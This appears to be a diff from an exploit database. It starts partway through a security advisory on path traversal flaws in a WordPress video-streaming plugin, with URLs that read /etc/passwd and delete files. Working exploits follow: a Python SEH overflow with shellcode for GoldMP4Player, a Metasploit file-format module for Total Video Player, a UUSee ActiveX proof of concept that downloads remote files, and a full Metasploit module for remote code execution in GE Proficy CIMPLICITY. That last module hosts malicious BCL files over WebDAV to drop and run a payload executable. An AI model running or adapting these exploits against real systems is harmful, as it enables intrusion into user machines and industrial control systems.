The exploitation example below displays contents of "/etc/passwd" file:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/rtmp_login.php?s=../../../../../../etc/passwd
3.2 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log
out.php" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences.
The exploitation example below deletes a file "/tmp/immuniweb":
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb
Successful exploitation of this vulnerability requires that file "/tmp/immuniweb" exists on the system.
4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908
4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application.
The following URL can be used to gain knowledge of full installation path of the application:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/bp.php
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/videowhisper_streaming.php
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/rtmp.inc.php
------------------------------------------------------------------------
-----------------------
Solution:
Update to VideoWhisper Live Streaming Integration version 4.29.5
------------------------------------------------------------------------
-----------------------
References:
[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress.
[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog pages.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
------------------------------------------------------------------------
-----------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

33
platforms/windows/local/31972.py Executable file
View file

@ -0,0 +1,33 @@
#!/usr/bin/python
# coding: utf-8
#Exploit Title: GoldMP4Player Buffer Overflow (SEH)
#Software Link: http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html
#Version: 3.3
#Date: 27.02.2014
#Tested on: Windows Win 7 En
# Howto / Notes:
#open the URL in filename via File -> Open Flash URL\n";
#-------------------------------------------------------
'''Credits:
Vulnerability POC identified in v3.3 by Gabor Seljan
http://www.exploit-db.com/exploits/31914/'''
#------------------------------------------------------
head="http://"
buff="\x41" * 253
#shell calc.exe
buff+=("ëÿÿœ¼‰áÛÖÙqôZJJJJJJJJJJJCCCCCC7RYjAXP0A0AkAAQ2AB2BB0BBABXP8"
"ABuJIylHhlIePePGpapMYJEFQiBBDlKpRVPnk3btLNkv24TlKrRDhdOMgBj7Vtq9oTq9PllUlpac"
"LdBFLa09QHO4M31kwjBL01BpWLKpRvpNk3rElFaZpnk1PBXou9PQdPJvajpbplKrhR8NkpXa0wqI"
"CIsgLqYlKp4nkgqKfEakOVQIPllzaHOtMuQxGGHYpsEJTVcSMYh5kqm141ehbchNkshtdWqYC0fLK"
"fl2klKrx5LWqxSlKgtlKuQxPmYstEtEtsksku10YcjpQkOypf8QOpZLKeBhkk6QMSZ31nmouMiGpEP"
"s0f02HdqlKpoLGkOjuOKjPOEI2QFCXi6NuoMomkOju5ls6SL6jOpkKYpsE4EOKBgdSd20orJWppSio"
"IERCParLbCDnbEsH0e30AA")
head2=".swf"
exploit=head + buff + head2
try:
out_file = open("exploit.txt",'w')
out_file.write(exploit)
out_file.close()
except:
print "Error"

73
platforms/windows/local/31988.rb Executable file
View file

@ -0,0 +1,73 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability
occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\".
This module has been tested successfully over Windows WinXp-Sp3-EN, Windows 7, Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mike Czumak', # (T_v3rn1x) -- @SecuritySift
'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '100619' ],
[ 'EDB', '29799' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\xff",
'Space' => 1787,
'DisableNops' => true,
},
'Targets' =>
[
[ 'Windows Universal',
{
'Ret' => 0x10012848, # pop ebx # pop ecx # ret - hskin.dll
'Offset' => 256
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 24 2013',
'DefaultTarget' => 0))
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'Settings.ini']),], self.class)
end
def exploit
buffer = "[Support Groups]\r\nVideo="
buffer << rand_text(target['Offset'])
buffer << generate_seh_payload(target.ret)
buffer << payload.encoded
buffer << "\r\n[AssociateType]\r\nAssociateType =1"
file_create(buffer)
end
end

9
platforms/windows/remote/31980.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29963/info
UUSee is prone to a vulnerability that can cause malicious files to be downloaded and saved to arbitrary locations on an affected computer.
Attackers may exploit this issue to overwrite sensitive files with malicious data that will compromise the affected computer. Other attacks are possible.
UUSee 2008 is vulnerable; other versions may also be affected.
<html> <object classid='clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B' id='target'></object> <script language='vbscript'> arg1="\Program Files\Common Files\uusee\" arg2="http://www.example.com/UU.ini" arg3="http://www.example2.com/mini3/uusee_client_update/remark.php" arg4=1 target.Update arg1 ,arg2 ,arg3 ,arg4 </script> </html>

315
platforms/windows/remote/31987.rb Executable file
View file

@ -0,0 +1,315 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Auxiliary::Report
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
def initialize
super(
'Name' => 'GE Proficy CIMPLICITY gefebt.exe Remote Code Execution',
'Description' => %q{
This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the
CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in
shared resources. An attacker can abuse this behaviour to execute a malicious BCL and
drop an arbitrary EXE. The last one can be executed remotely through the WebView server.
This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded
CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. When
the target hasn't the WebClient service enabled, an external SMB service is necessary.
},
'Author' => [
'amisto0x07', # Vulnerability discovery
'Z0mb1E', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2014-0750'],
[ 'ZDI', '14-015' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01' ]
],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Platform' => 'win',
'Targets' =>
[
[ 'GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)', { } ]
],
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => 'Jan 23 2014'
)
register_options(
[
Opt::RPORT(80),
OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/' ]),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on (do not change)', 80 ]),
OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]),
OptBool.new('ONLYMAKE', [ false, 'Just generate the malicious BCL files for using with an external SMB server.', true ]),
OptString.new('TARGETURI', [true, 'The base path to the CimWeb', '/'])
], self.class)
end
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
when 'PROPFIND'
process_propfind(cli, request)
when 'GET'
process_get(cli, request)
else
vprint_status("#{request.method} => 404 (#{request.uri})")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
end
def process_get(cli, request)
if request.uri =~ /#{@basename}(\d)\.bcl/
print_status("GET => Payload")
data = @bcls[$1.to_i]
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
# Anything else is probably a request for a data file...
vprint_status("GET => DATA (#{request.uri})")
data = rand_text_alpha(8 + rand(10))
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
end
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options(cli, request)
vprint_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
#
# PROPFIND requests sent by the WebDav Mini-Redirector
#
def process_propfind(cli, request)
path = request.uri
print_status("Received WebDAV PROPFIND request")
body = ''
if (path =~ /\.bcl$/i)
print_status("Sending BCL multistatus for #{path} ...")
body = %Q|<?xml version="1.0"?>
<a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:">
<a:response>
</a:response>
</a:multistatus>
|
elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
# Response for anything else (generally just /)
print_status("Sending directory multistatus for #{path} ...")
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
else
print_status("Sending 404 for #{path} ...")
send_not_found(cli)
return
end
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
def check
uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe")
uri << "?"
res = send_request_cgi('uri' => uri)
# res.to_s is used because the CIMPLICITY embedded web server
# doesn't send HTTP compatible responses.
if res and res.code == 200 and res.to_s =~ /Usage.*gefebt\.exe/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def exploit
@extensions = "bcl"
@bcls= []
@total_exe = 0
setup_resources
make_bcls
print_status("BCL's available at #{@exploit_unc}#{@share_name}\\#{@basename}{i}.bcl")
unless datastore['UNCPATH'].blank?
@bcls.each_index { |i| file_create("#{@basename}#{i}.bcl", @bcls[i]) }
if datastore['ONLYMAKE']
print_warning("Files created, remember to upload the BCL files to the remote share!")
print_warning("Once ready set ONLYMAKE to false")
else
exploit_bcl
end
return
end
super
end
def setup_resources
if datastore['UNCPATH'].blank?
# Using WebDAV
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
@basename = rand_text_alpha(3)
@share_name = rand_text_alpha(3)
@exploit_unc = "\\\\#{my_host}\\"
@exe_filename = "#{rand_text_alpha(3 + rand(4))}.exe"
unless datastore['SRVPORT'].to_i == 80 && datastore['URIPATH'] == '/'
fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
else
# Using external SMB Server
if datastore['UNCPATH'] =~ /(\\\\[^\\]*\\)([^\\]*)\\([^\\]*)\.bcl/
@exploit_unc = $1
@share_name = $2
@basename = $3
# Use an static file name for the EXE since the module doesn't
# deliver the BCL files in this case.
@exe_filename = "ge_pld.exe"
else
fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.blc')
end
end
end
def make_bcls
exe = generate_payload_exe
# Padding to be sure we're aligned to 4 bytes.
exe << "\x00" until exe.length % 4 == 0
longs = exe.unpack("l*")
offset = 0
# gefebt.exe isn't able to handle (on my test environment) long
# arrays bigger than 16000, so we need to split it.
while longs.length > 0
parts = longs.slice!(0, 16000)
@bcls << generate_bcl(parts , offset)
offset += parts.length * 4
end
end
def generate_bcl(slices, offset)
bcl_payload = ""
slices.each_index do |i|
bcl_payload << "s(#{i + 1}) = #{slices[i]}\n"
end
<<-EOF
Option CStrings On
Sub Main()
Open "#{@exe_filename}" For Binary Access Write As #1
Dim s(#{slices.length}) As Long
#{bcl_payload}
For x = 1 To #{slices.length}
t = x - 1
Put #1,t*4+1+#{offset},s(x)
Next x
Close
End Sub
EOF
end
def execute_bcl(i)
print_status("#{peer} - Executing BCL code #{@basename}#{i}.bcl to drop final payload...")
uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe")
uri << "?#{@exploit_unc}#{@share_name}\\#{@basename}#{i}.bcl"
res = send_request_cgi('uri' => uri)
# We use res.to_s because the embedded CIMPLICITY Web server doesn't
# answer with valid HTTP responses.
if res and res.code == 200 and res.to_s =~ /(^Error.*$)/
print_error("#{peer} - Server answered with error: $1")
fail_with(Failure::Unknown, "#{peer} - Server answered with error")
elsif res and res.code == 200 and res.to_s =~ /No such file or directory/
fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file")
elsif res and res.code == 200
print_good("#{peer} - Answer has been successful")
else
fail_with(Failure::Unknown, "#{peer} - Unknown error")
end
end
def exploit_bcl
@bcls.each_index do |i|
execute_bcl(i)
end
print_status("#{peer} - Executing #{@exe_filename}...")
uri = normalize_uri(target_uri.to_s, "CimWeb", @exe_filename)
uri << "?"
# Enough timeout to execute the payload, but don't block the exploit
# until there is an answer.
send_request_cgi({'uri' => uri}, 3)
end
def primer
exploit_bcl
service.stop
end
def file_create(fname, data)
ltype = "exploit.fileformat.#{self.shortname}"
full_path = store_local(ltype, nil, data, fname)
print_good("#{fname} stored at #{full_path}")
end
end